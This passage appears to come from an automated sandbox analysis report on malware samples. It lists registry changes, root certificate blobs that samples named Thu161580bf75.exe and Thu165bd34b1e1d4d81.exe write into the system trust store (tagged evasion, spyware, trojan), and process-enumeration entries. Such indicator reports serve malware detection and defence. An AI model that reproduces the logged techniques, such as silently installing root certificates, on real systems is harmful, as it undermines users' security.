Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\AppName = "dfsvc.exe"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AED-AECE-4E27-9BCB-5358B13F9FF9}\AppName = "dfsvc.exe"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\AppPath = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7}\CLSID = "{20FD4E26-8E0F-4F73-A0E0-F27B8C57BE6F}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8999AEC-AECE-4E27-9BCB-5358B13F9FF9}\AppPath = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F1E561D-AF17-4510-B996-351BBA0862A7}\Policy = "3"	msiexec.exe

Modifies data under HKEY_USERS 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 5048d73907bcd701	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\67BDC06	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\27	msiexec.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{10A8B906-2F7A-327C-87AB-1A95A9B5E23E}\4.0.0.0\Class = "System.Security.Principal.TokenAccessLevels"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Record\{51191552-C65E-360D-BA21-9F0E454FD59F}\4.0.0.0	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{AD1CECF5-5FAD-3ECF-AD89-2FEBD6521FA9}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Record\{BF1BF727-537F-3284-9CA9-5ADF12641AB5}\4.0.0.0	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{215B68E5-0E78-4505-BE40-962EE3A0C379}\NumMethods	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{048FA0C2-8EBB-3BC2-A47F-01F12A32008E}\4.0.0.0\RuntimeVersion = "v4.0.30319"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{A1CB710C-8D50-3181-BB38-65CE2E98F9A6}\4.0.0.0\Class = "System.IntPtr"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{D25ED092-A7A8-3BBE-820C-42F5A4604768}\4.0.0.0\Class = "System.Reflection.Emit.StackBehaviour"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{0EF507FF-0B48-40AD-84DB-E4C7AB81B74A}\ProxyStubClsid32	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Record\{33AB08B6-BF88-37F9-9815-377FF0CBC244}\4.0.0.0	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{5A235286-93F1-3C18-A3AE-16D345A87A24}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{7055B1DB-D445-31FC-BDEC-A9FB3F6E6E58}\4.0.0.0\Class = "System.Threading.ApartmentState"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{5C8422A6-F64B-4AA6-8D3C-78A3E988AA9E}\ProgID	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8EBCC90469BFE03EA485673BA14799F\KB2901126 = "Servicing_Key"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Record\{26170123-45FD-30F7-987D-BF3689662B6C}\4.0.0.0	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{A2959123-2F66-35B4-815D-37C83360809B}\4.0.0.0\RuntimeVersion = "v4.0.30319"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{C71DCE2B-B87F-37A9-89ED-F1145955BCD6}\4.0.0.0\Class = "System.Runtime.InteropServices.HandleRef"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DC516615-47BE-477e-8B55-C5ABE0D76B8F}\ = "ICorSvcWorker3"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Record\{5028FCA3-2398-3BD5-881B-E2C36FD688F2}\4.0.0.0	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5C8422A6-F64B-4AA6-8D3C-78A3E988AA9E}\InprocServer32\ThreadingModel = "Apartment"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20C6F4C2-80A8-4310-A59A-1CC487334236}\ProgID\ = "PenIMC4v2.PimcSurrogate2.4"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{C5C3792C-90C0-3B71-BA9D-AE20CFBD9FB4}\4.0.0.0\Class = "System.Security.AccessControl.ControlFlags"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{45FB4600-E6E8-4928-B25E-50476FF79425}\NotInsertable\	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Record\{74CAA246-BE0E-3AE5-A17C-946E10D89626}\4.0.0.0	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{7D29BC4B-8FBC-38AA-8B35-ED4539A1CF8E}\4.0.0.0\Class = "System.Security.Principal.PrincipalPolicy"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{CFB98CA9-8121-35BE-AF40-C176C616A16B}\4.0.0.0\RuntimeVersion = "v4.0.30319"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{BFFECCA7-4069-49F9-B5AB-7CCBB078ED91}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{4F93B8DD-5396-3B65-B16A-11FBC8812A71}\4.0.0.0\Class = "System.UIntPtr"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{791EC67C-5A1B-35FD-832D-80B02D07ED6D}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{0C95F5FC-7ECD-3FAF-BB3F-DC26DD3797A8}\4.0.0.0\Assembly = "System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{4F93B8DD-5396-3B65-B16A-11FBC8812A71}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{0EF507FF-0B48-40AD-84DB-E4C7AB81B74A}\NumMethods	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{049C5C49-BAF0-429C-8B8F-2CC11F5AA422}\NumMethods	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{01E0556B-47CF-36AE-AE30-3FB59E8885B6}\4.0.0.0\RuntimeVersion = "v4.0.30319"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D37E2A3E-8545-3A39-9F4F-31827C9124AB}\2.4	regtlibv12.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8EBCC90469BFE03EA485673BA14799F\F_misc_client_x86 = "NetFx_Full_x86"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{51E1B3CA-D3CB-39BF-A016-6199569E74B2}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Record\{A7ED05C6-FECF-3C35-BA3B-84163AC1D5E5}\4.0.0.0	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{C3008E12-9B16-36EC-B731-73257F25BE7A}\4.0.0.0\RuntimeVersion = "v4.0.30319"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{C8679E0A-1C67-3A20-8645-0D930F529031}\4.0.0.0\RuntimeVersion = "v4.0.30319"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Record\{CF015678-95A9-3B12-855C-C095CDE208AF}\4.0.0.0	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Record\{902A6B65-41BD-32F1-A233-075F009D459C}\4.0.0.0	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{A419B664-DABD-383D-A0DB-991487D41E14}\4.0.0.0\Class = "System.Reflection.Emit.Label"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8EBCC90469BFE03EA485673BA14799F\F_CDF_core_x86 = "NetFx_Full_x86"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Record\{CFB98CA9-8121-35BE-AF40-C176C616A16B}\4.0.0.0	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{D89E7F8E-9F99-3EE9-8FCE-D97E64C8650E}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BFFECCA7-4069-49F9-B5AB-7CCBB078ED91}\InprocServer32\4.0.0.0\RuntimeVersion = "v4.0.30319"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{45FB4600-E6E8-4928-B25E-50476FF79425}\InprocServer32\ThreadingModel = "Both"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{6EE96102-3657-3D66-867A-26B63AAAAF78}\4.0.0.0\Class = "System.Char"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Record\{75A7861C-767E-3A5E-A57B-6EC136009654}\4.0.0.0	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{AB8E1300-F46A-3FFD-BCEF-A45DE1C55458}\4.0.0.0\Class = "System.Globalization.CultureTypes"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{C888351B-5DFD-3A9F-8D36-96E7770D0EBF}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{EEC01711-50DE-36E8-ABA5-DAA1D74E0C32}\4.0.0.0\RuntimeVersion = "v4.0.30319"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8EBCC90469BFE03EA485673BA14799F\KB3006566 = "Servicing_Key"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{A521101D-A776-3125-B530-67030F2E0A21}\4.0.0.0\Assembly = "System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{72B06367-DE53-3111-9C49-B816EFEE3148}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{BA5ED019-F669-3C35-93AC-3ABF776B62B3}\10.0.0.0\Class = "Microsoft.JScript.JSFunctionAttributeEnum"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\AppID\{953E4863-7AD1-4DAE-B2BD-108F1D57967B}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{CF015678-95A9-3B12-855C-C095CDE208AF}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{BA731F6A-3D25-39AE-BE18-C2EF646AE58B}\10.0.0.0\Assembly = "Microsoft.JScript, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{215B68E5-0E78-4505-BE40-962EE3A0C379}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{78C18A10-C00E-3C09-B000-411C38900C2C}\4.0.0.0\Assembly = "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{A7ED05C6-FECF-3C35-BA3B-84163AC1D5E5}\4.0.0.0\Class = "System.Reflection.Emit.OpCode"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{B42619B4-0EDC-3F55-AA64-2140275FA115}\4.0.0.0\Class = "System.Runtime.InteropServices.ImporterEventKind"	msiexec.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

pid	Process
1820	reg.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Thu161580bf75.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Thu161580bf75.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Thu161580bf75.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Thu165bd34b1e1d4d81.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Thu165bd34b1e1d4d81.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Thu161580bf75.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1028	conhost.exe
1028	conhost.exe
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
